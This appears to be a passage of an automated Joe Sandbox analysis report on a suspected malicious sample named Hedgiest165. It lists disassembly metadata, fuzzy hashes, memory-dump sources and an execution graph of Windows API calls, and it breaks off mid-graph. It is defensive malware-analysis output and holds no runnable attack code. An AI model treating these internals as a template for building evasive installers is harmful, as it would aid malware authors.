                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: nsa
                                                                        • API String ID: 1716503409-2209301699
                                                                        • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                        • Instruction ID: 92234304539bf7ece852ec87847853e593a29ed380df2f8ac1d63cab01e19b90
                                                                        • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                        • Instruction Fuzzy Hash: 9DF09076B00204BBEB00CF59ED09E9FB7ACEB95750F11803AEA44F7140E6B499548B68
                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,Error launching installer), ref: 004059ED
                                                                        • CloseHandle.KERNEL32(?), ref: 004059FA
                                                                        Strings
                                                                        • Error launching installer, xrefs: 004059D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                        • Instruction ID: 20697c874bd4b9c747bb4d9041eb299060a3c9f0112610a55a8a246a05e7abf4
                                                                        • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                        • Instruction Fuzzy Hash: 7DE0BFB46002097FEB109B64ED45F7B77ACEB04708F414966BD50F6150DB7499158E7C
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
                                                                        • Instruction ID: 32e2ab4cb65e7230aeff806a84dbae4d22e6cbaaf638251473bf6dacb733d759
                                                                        • Opcode Fuzzy Hash: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
                                                                        • Instruction Fuzzy Hash: 29A13231E04229CBDF28CFA8C8546ADBBB1FF45305F14806ED856BB281D7786A86DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
                                                                        • Instruction ID: e827159e3c0f30117cfd40fb8871c1536360b3329485a12100fd3651e411c43c
                                                                        • Opcode Fuzzy Hash: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
                                                                        • Instruction Fuzzy Hash: A4912230E04228CBDF28CFA8C854BADBBB1FB45305F14816ED852BB281C7786986DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
                                                                        • Instruction ID: e886ca087a0a39174fbb15e481659c292d22b9db4249bf85fd90a7a13df170d2
                                                                        • Opcode Fuzzy Hash: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
                                                                        • Instruction Fuzzy Hash: 99813671E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB291C7785986DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
                                                                        • Instruction ID: 102eaf4500afa36507883bc49c2e43cf6988b9622fad8f3b05d2dee193d28093
                                                                        • Opcode Fuzzy Hash: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
                                                                        • Instruction Fuzzy Hash: 59814631E04228DBEB24CFA8C8447ADBBB1FB45305F24816AD856BB2C1D7786986DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
                                                                        • Instruction ID: a08c2ff1229a9d9811f570562685937cd52cd07e2c0e62d18be643d670bbfbbc
                                                                        • Opcode Fuzzy Hash: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
                                                                        • Instruction Fuzzy Hash: B2712471E04228CFDF24CFA8C894BADBBB1FB45305F14806AD846BB281D7386996DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                        • Instruction ID: 79a44bce1fc769ef2bff189c36481e04bceb851a7a33cd9c662bfef797063258
                                                                        • Opcode Fuzzy Hash: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                        • Instruction Fuzzy Hash: 16713571E04218CFDF28CFA8C854BADBBB1FB45305F14806AD856BB281C7786996DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
                                                                        • Instruction ID: e69ca442741bc9d68f02c0d51ce09155c0cc214200520a71f8620544c8c92ec3
                                                                        • Opcode Fuzzy Hash: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
                                                                        • Instruction Fuzzy Hash: 78713731E04229CFEF24CF98C854BADBBB1FB45305F14806AD856BB281C7786996DF45
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E5E
                                                                        • CharNextA.USER32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E6F
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                        • Instruction ID: 98c30faecf84a4e678f1c8c5aee25e578da6ba24d366b38437dab149ad6906fd
                                                                        • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                        • Instruction Fuzzy Hash: 4AF06232504458FFD7029BA5DD04DAEBBA8EF16354B2540AAE884F7210D674EF01DBA9

                                                                        Execution Graph

                                                                        Execution Coverage:6.7%
                                                                        Dynamic/Decrypted Code Coverage:9.2%
                                                                        Signature Coverage:3.5%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:100
                                                                        execution_graph 37630 415321 realloc 37631 41534d 37630->37631 37632 415340 37630->37632 37634 416760 11 API calls 37631->37634 37634->37632 37635 44dea5 37636 44deb5 FreeLibrary 37635->37636 37637 44dec3 37635->37637 37636->37637 37638 4287c1 37639 4287d2 37638->37639 37642 429ac1 37638->37642 37643 428818 37639->37643 37644 42881f 37639->37644 37653 425711 37639->37653 37640 4259da 37701 416760 11 API calls 37640->37701 37672 425ad6 37642->37672 37708 415c56 11 API calls 37642->37708 37675 42013a 37643->37675 37703 420244 97 API calls 37644->37703 37646 4260dd 37702 424251 120 API calls 37646->37702 37649 4259c2 37649->37672 37695 415c56 11 API calls 37649->37695 37653->37640 37653->37642 37653->37649 37656 429a4d 37653->37656 37659 422aeb memset memcpy memcpy 37653->37659 37663 4260a1 37653->37663 37671 425a38 37653->37671 37691 4227f0 memset memcpy 37653->37691 37692 422b84 15 API calls 37653->37692 37693 422b5d memset memcpy memcpy 37653->37693 37694 422640 13 API calls 37653->37694 37696 4241fc 11 API calls 37653->37696 37697 42413a 90 API calls 37653->37697 37657 429a66 37656->37657 37658 429a9b 37656->37658 37704 415c56 11 API calls 37657->37704 37662 429a96 37658->37662 37706 416760 11 API calls 37658->37706 37659->37653 37707 424251 120 API calls 37662->37707 37700 415c56 11 API calls 37663->37700 37665 429a7a 37705 416760 11 API calls 37665->37705 37671->37649 37698 422640 13 API calls 37671->37698 37699 4226e0 12 API calls 37671->37699 37676 42014c 37675->37676 37679 420151 37675->37679 37718 41e466 97 API calls 37676->37718 37678 420162 37678->37653 37679->37678 37680 4201b3 37679->37680 37681 420229 37679->37681 37682 4201b8 37680->37682 37683 4201dc 37680->37683 37681->37678 37684 41fd5e 86 API calls 37681->37684 37709 41fbdb 37682->37709 37683->37678 37687 4201ff 37683->37687 37715 41fc4c 37683->37715 37684->37678 37687->37678 37690 42013a 97 API calls 37687->37690 37690->37678 37691->37653 37692->37653 37693->37653 37694->37653 37695->37640 37696->37653 37697->37653 37698->37671 37699->37671 37700->37640 37701->37646 37702->37672 37703->37653 37704->37665 37705->37662 37706->37662 37707->37642 37708->37640 37710 41fbf1 37709->37710 37711 41fbf8 37709->37711 37714 41fc39 37710->37714 37733 4446ce 11 API calls 37710->37733 37723 41ee26 37711->37723 37714->37678 37719 41fd5e 37714->37719 37716 41ee6b 86 API calls 37715->37716 37717 41fc5d 37716->37717 37717->37683 37718->37679 37720 41fd65 37719->37720 37721 41fdab 37720->37721 37722 41fbdb 86 API calls 37720->37722 37721->37678 37722->37720 37724 41ee41 37723->37724 37725 41ee32 37723->37725 37734 41edad 37724->37734 37737 4446ce 11 API calls 37725->37737 37728 41ee3c 37728->37710 37731 41ee58 37731->37728 37739 41ee6b 37731->37739 37733->37714 37743 41be52 37734->37743 37737->37728 37738 41eb85 11 API calls 37738->37731 37740 41ee70 37739->37740 37741 41ee78 37739->37741 37796 41bf99 86 API calls 37740->37796 37741->37728 37744 41be6f 37743->37744 37745 41be5f 37743->37745 37750 41be8c 37744->37750 37775 418c63 memset memset 37744->37775 37774 4446ce 11 API calls 37745->37774 37747 41be69 37747->37728 37747->37738 37750->37747 37751 41bf3a 37750->37751 37753 41bed1 37750->37753 37755 41bee7 37750->37755 37778 4446ce 11 API calls 37751->37778 37754 41bef0 37753->37754 37757 41bee2 37753->37757 37754->37755 37756 41bf01 37754->37756 37755->37747 37779 41a453 86 API calls 37755->37779 37758 41bf24 memset 37756->37758 37760 41bf14 37756->37760 37776 418a6d memset memcpy memset 37756->37776 37764 41ac13 37757->37764 37758->37747 37777 41a223 memset memcpy memset 37760->37777 37763 41bf20 37763->37758 37765 41ac52 37764->37765 37766 41ac3f memset 37764->37766 37768 41ac6a 37765->37768 37780 41dc14 19 API calls 37765->37780 37771 41acd9 37766->37771 37769 41aca1 37768->37769 37781 41519d 37768->37781 37769->37771 37772 41acc0 memset 37769->37772 37773 41accd memcpy 37769->37773 37771->37755 37772->37771 37773->37771 37774->37747 37775->37750 37776->37760 37777->37763 37778->37755 37780->37768 37784 4175ed 37781->37784 37792 417570 SetFilePointer 37784->37792 37787 41760a ReadFile 37788 417637 37787->37788 37789 417627 GetLastError 37787->37789 37790 4151b3 37788->37790 37791 41763e memset 37788->37791 37789->37790 37790->37769 37791->37790 37793 41759c GetLastError 37792->37793 37795 4175b2 37792->37795 37794 4175a8 GetLastError 37793->37794 37793->37795 37794->37795 37795->37787 37795->37790 37796->37741 37797 417bc5 37798 417c61 37797->37798 37799 417bda 37797->37799 37799->37798 37800 417bf6 UnmapViewOfFile CloseHandle 37799->37800 37802 417c2c 37799->37802 37804 4175b7 37799->37804 37800->37799 37800->37800 37802->37799 37809 41851e 20 API calls 37802->37809 37805 4175d6 CloseHandle 37804->37805 37806 4175c8 37805->37806 37807 4175df 37805->37807 37806->37807 37808 4175ce Sleep 37806->37808 37807->37799 37808->37805 37809->37802 37810 4152c7 malloc 37811 4152ef 37810->37811 37813 4152e2 37810->37813 37814 416760 11 API calls 37811->37814 37814->37813 37815 415308 free 37816 41276d 37817 41277d 37816->37817 37859 4044a4 LoadLibraryW 37817->37859 37819 412785 37820 412789 37819->37820 37867 414b81 37819->37867 37823 4127c8 37873 412465 memset ??2@YAPAXI 37823->37873 37825 4127ea 37885 40ac21 37825->37885 37830 412813 37903 40dd07 memset 37830->37903 37831 412827 37908 40db69 memset 37831->37908 37834 412822 37929 4125b6 ??3@YAXPAX 37834->37929 37836 40ada2 _wcsicmp 37838 41283d 37836->37838 37838->37834 37841 412863 CoInitialize 37838->37841 37913 41268e 37838->37913 37933 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37841->37933 37844 41296f 37935 40b633 37844->37935 37846 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37851 412957 CoUninitialize 37846->37851 37856 4128ca 37846->37856 37851->37834 37852 4128d0 TranslateAcceleratorW 37853 412941 GetMessageW 37852->37853 37852->37856 37853->37851 37853->37852 37854 412909 IsDialogMessageW 37854->37853 37854->37856 37855 4128fd IsDialogMessageW 37855->37853 37855->37854 37856->37852 37856->37854 37856->37855 37857 41292b TranslateMessage DispatchMessageW 37856->37857 37858 41291f IsDialogMessageW 37856->37858 37857->37853 37858->37853 37858->37857 37860 4044f7 37859->37860 37861 4044cf GetProcAddress 37859->37861 37865 404507 MessageBoxW 37860->37865 37866 40451e 37860->37866 37862 4044e8 FreeLibrary 37861->37862 37863 4044df 37861->37863 37862->37860 37864 4044f3 37862->37864 37863->37862 37864->37860 37865->37819 37866->37819 37868 414b8a 37867->37868 37869 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37867->37869 37939 40a804 memset 37868->37939 37869->37823 37872 414b9e GetProcAddress 37872->37869 37874 4124e0 37873->37874 37875 412505 ??2@YAPAXI 37874->37875 37876 41251c 37875->37876 37881 412521 37875->37881 37961 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37876->37961 37950 444722 37881->37950 37884 41259b wcscpy 37884->37825 37966 40b1ab free free 37885->37966 37887 40ad76 37967 40aa04 37887->37967 37890 40a9ce malloc memcpy free free 37893 40ac5c 37890->37893 37891 40ad4b 37891->37887 37990 40a9ce 37891->37990 37893->37887 37893->37890 37893->37891 37894 40ace7 free 37893->37894 37970 40a8d0 37893->37970 37982 4099f4 37893->37982 37894->37893 37898 40a8d0 7 API calls 37898->37887 37899 40ada2 37900 40adc9 37899->37900 37901 40adaa 37899->37901 37900->37830 37900->37831 37901->37900 37902 40adb3 _wcsicmp 37901->37902 37902->37900 37902->37901 37995 40dce0 37903->37995 37905 40dd3a GetModuleHandleW 38000 40dba7 37905->38000 37909 40dce0 3 API calls 37908->37909 37910 40db99 37909->37910 38072 40dae1 37910->38072 38086 402f3a 37913->38086 37915 412766 37915->37834 37915->37841 37916 4126d3 _wcsicmp 37917 4126a8 37916->37917 37917->37915 37917->37916 37919 41270a 37917->37919 38120 4125f8 7 API calls 37917->38120 37919->37915 38089 411ac5 37919->38089 37930 4125da 37929->37930 37931 4125f0 37930->37931 37932 4125e6 DeleteObject 37930->37932 37934 40b1ab free free 37931->37934 37932->37931 37933->37846 37934->37844 37936 40b640 37935->37936 37937 40b639 free 37935->37937 37938 40b1ab free free 37936->37938 37937->37936 37938->37820 37940 40a83b GetSystemDirectoryW 37939->37940 37941 40a84c wcscpy 37939->37941 37940->37941 37946 409719 wcslen 37941->37946 37944 40a881 LoadLibraryW 37945 40a886 37944->37945 37945->37869 37945->37872 37947 409724 37946->37947 37948 409739 wcscat LoadLibraryW 37946->37948 37947->37948 37949 40972c wcscat 37947->37949 37948->37944 37948->37945 37949->37948 37951 444732 37950->37951 37952 444728 DeleteObject 37950->37952 37962 409cc3 37951->37962 37952->37951 37954 412551 37955 4010f9 37954->37955 37956 401130 37955->37956 37957 401134 GetModuleHandleW LoadIconW 37956->37957 37958 401107 wcsncat 37956->37958 37959 40a7be 37957->37959 37958->37956 37960 40a7d2 37959->37960 37960->37884 37960->37960 37961->37881 37965 409bfd memset wcscpy 37962->37965 37964 409cdb CreateFontIndirectW 37964->37954 37965->37964 37966->37893 37968 40aa14 37967->37968 37969 40aa0a free 37967->37969 37968->37899 37969->37968 37971 40a8eb 37970->37971 37972 40a8df wcslen 37970->37972 37973 40a906 free 37971->37973 37974 40a90f 37971->37974 37972->37971 37975 40a919 37973->37975 37976 4099f4 3 API calls 37974->37976 37977 40a932 37975->37977 37978 40a929 free 37975->37978 37976->37975 37980 4099f4 3 API calls 37977->37980 37979 40a93e memcpy 37978->37979 37979->37893 37981 40a93d 37980->37981 37981->37979 37983 409a41 37982->37983 37984 4099fb malloc 37982->37984 37983->37893 37986 409a37 37984->37986 37987 409a1c 37984->37987 37986->37893 37988 409a30 free 37987->37988 37989 409a20 memcpy 37987->37989 37988->37986 37989->37988 37991 40a9e7 37990->37991 37992 40a9dc free 37990->37992 37993 4099f4 3 API calls 37991->37993 37994 40a9f2 37992->37994 37993->37994 37994->37898 38019 409bca GetModuleFileNameW 37995->38019 37997 40dce6 wcsrchr 37998 40dcf5 37997->37998 37999 40dcf9 wcscat 37997->37999 37998->37999 37999->37905 38020 44db70 38000->38020 38004 40dbfd 38023 4447d9 38004->38023 38007 40dc34 wcscpy wcscpy 38049 40d6f5 38007->38049 38008 40dc1f wcscpy 38008->38007 38011 40d6f5 3 API calls 38012 40dc73 38011->38012 38013 40d6f5 3 API calls 38012->38013 38014 40dc89 38013->38014 38015 40d6f5 3 API calls 38014->38015 38016 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38015->38016 38055 40da80 38016->38055 38019->37997 38021 40dbb4 memset memset 38020->38021 38022 409bca GetModuleFileNameW 38021->38022 38022->38004 38024 4447f4 38023->38024 38025 40dc1b 38024->38025 38026 444807 ??2@YAPAXI 38024->38026 38025->38007 38025->38008 38027 44481f 38026->38027 38028 444873 _snwprintf 38027->38028 38029 4448ab wcscpy 38027->38029 38062 44474a 8 API calls 38028->38062 38031 4448bb 38029->38031 38063 44474a 8 API calls 38031->38063 38032 4448a7 38032->38029 38032->38031 38034 4448cd 38064 44474a 8 API calls 38034->38064 38036 4448e2 38065 44474a 8 API calls 38036->38065 38038 4448f7 38066 44474a 8 API calls 38038->38066 38040 44490c 38067 44474a 8 API calls 38040->38067 38042 444921 38068 44474a 8 API calls 38042->38068 38044 444936 38069 44474a 8 API calls 38044->38069 38046 44494b 38070 44474a 8 API calls 38046->38070 38048 444960 ??3@YAXPAX 38048->38025 38050 44db70 38049->38050 38051 40d702 memset GetPrivateProfileStringW 38050->38051 38052 40d752 38051->38052 38053 40d75c WritePrivateProfileStringW 38051->38053 38052->38053 38054 40d758 38052->38054 38053->38054 38054->38011 38056 44db70 38055->38056 38057 40da8d memset 38056->38057 38058 40daac LoadStringW 38057->38058 38061 40dac6 38058->38061 38060 40dade 38060->37834 38061->38058 38061->38060 38071 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38061->38071 38062->38032 38063->38034 38064->38036 38065->38038 38066->38040 38067->38042 38068->38044 38069->38046 38070->38048 38071->38061 38082 409b98 GetFileAttributesW 38072->38082 38074 40daea 38075 40daef wcscpy wcscpy GetPrivateProfileIntW 38074->38075 38081 40db63 38074->38081 38083 40d65d GetPrivateProfileStringW 38075->38083 38077 40db3e 38084 40d65d GetPrivateProfileStringW 38077->38084 38079 40db4f 38085 40d65d GetPrivateProfileStringW 38079->38085 38081->37836 38082->38074 38083->38077 38084->38079 38085->38081 38121 40eaff 38086->38121 38090 411ae2 memset 38089->38090 38091 411b8f 38089->38091 38161 409bca GetModuleFileNameW 38090->38161 38103 411a8b 38091->38103 38093 411b0a wcsrchr 38094 411b22 wcscat 38093->38094 38095 411b1f 38093->38095 38162 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38094->38162 38095->38094 38097 411b67 38163 402afb 38097->38163 38101 411b7f 38219 40ea13 SendMessageW memset SendMessageW 38101->38219 38104 402afb 27 API calls 38103->38104 38105 411ac0 38104->38105 38106 4110dc 38105->38106 38107 41113e 38106->38107 38112 4110f0 38106->38112 38244 40969c LoadCursorW SetCursor 38107->38244 38109 411143 38245 4032b4 38109->38245 38263 444a54 38109->38263 38110 4110f7 _wcsicmp 38110->38112 38111 411157 38113 40ada2 _wcsicmp 38111->38113 38112->38107 38112->38110 38266 410c46 10 API calls 38112->38266 38116 411167 38113->38116 38114 4111af 38116->38114 38117 4111a6 qsort 38116->38117 38117->38114 38120->37917 38122 40eb10 38121->38122 38134 40e8e0 38122->38134 38125 40eb6c memcpy memcpy 38126 40ebb7 38125->38126 38126->38125 38127 40ebf2 ??2@YAPAXI ??2@YAPAXI 38126->38127 38129 40d134 16 API calls 38126->38129 38128 40ec65 38127->38128 38130 40ec2e ??2@YAPAXI 38127->38130 38144 40ea7f 38128->38144 38129->38126 38130->38128 38133 402f49 38133->37917 38135 40e8f2 38134->38135 38136 40e8eb ??3@YAXPAX 38134->38136 38137 40e900 38135->38137 38138 40e8f9 ??3@YAXPAX 38135->38138 38136->38135 38139 40e911 38137->38139 38140 40e90a ??3@YAXPAX 38137->38140 38138->38137 38141 40e931 ??2@YAPAXI ??2@YAPAXI 38139->38141 38142 40e921 ??3@YAXPAX 38139->38142 38143 40e92a ??3@YAXPAX 38139->38143 38140->38139 38141->38125 38142->38143 38143->38141 38145 40aa04 free 38144->38145 38146 40ea88 38145->38146 38147 40aa04 free 38146->38147 38148 40ea90 38147->38148 38149 40aa04 free 38148->38149 38150 40ea98 38149->38150 38151 40aa04 free 38150->38151 38152 40eaa0 38151->38152 38153 40a9ce 4 API calls 38152->38153 38154 40eab3 38153->38154 38155 40a9ce 4 API calls 38154->38155 38156 40eabd 38155->38156 38157 40a9ce 4 API calls 38156->38157 38158 40eac7 38157->38158 38159 40a9ce 4 API calls 38158->38159 38160 40ead1 38159->38160 38160->38133 38161->38093 38162->38097 38220 40b2cc 38163->38220 38165 402b0a 38166 40b2cc 27 API calls 38165->38166 38167 402b23 38166->38167 38168 40b2cc 27 API calls 38167->38168 38169 402b3a 38168->38169 38170 40b2cc 27 API calls 38169->38170 38171 402b54 38170->38171 38172 40b2cc 27 API calls 38171->38172 38173 402b6b 38172->38173 38174 40b2cc 27 API calls 38173->38174 38175 402b82 38174->38175 38176 40b2cc 27 API calls 38175->38176 38177 402b99 38176->38177 38178 40b2cc 27 API calls 38177->38178 38179 402bb0 38178->38179 38180 40b2cc 27 API calls 38179->38180 38181 402bc7 38180->38181 38182 40b2cc 27 API calls 38181->38182 38183 402bde 38182->38183 38184 40b2cc 27 API calls 38183->38184 38185 402bf5 38184->38185 38186 40b2cc 27 API calls 38185->38186 38187 402c0c 38186->38187 38188 40b2cc 27 API calls 38187->38188 38189 402c23 38188->38189 38190 40b2cc 27 API calls 38189->38190 38191 402c3a 38190->38191 38192 40b2cc 27 API calls 38191->38192 38193 402c51 38192->38193 38194 40b2cc 27 API calls 38193->38194 38195 402c68 38194->38195 38196 40b2cc 27 API calls 38195->38196 38197 402c7f 38196->38197 38198 40b2cc 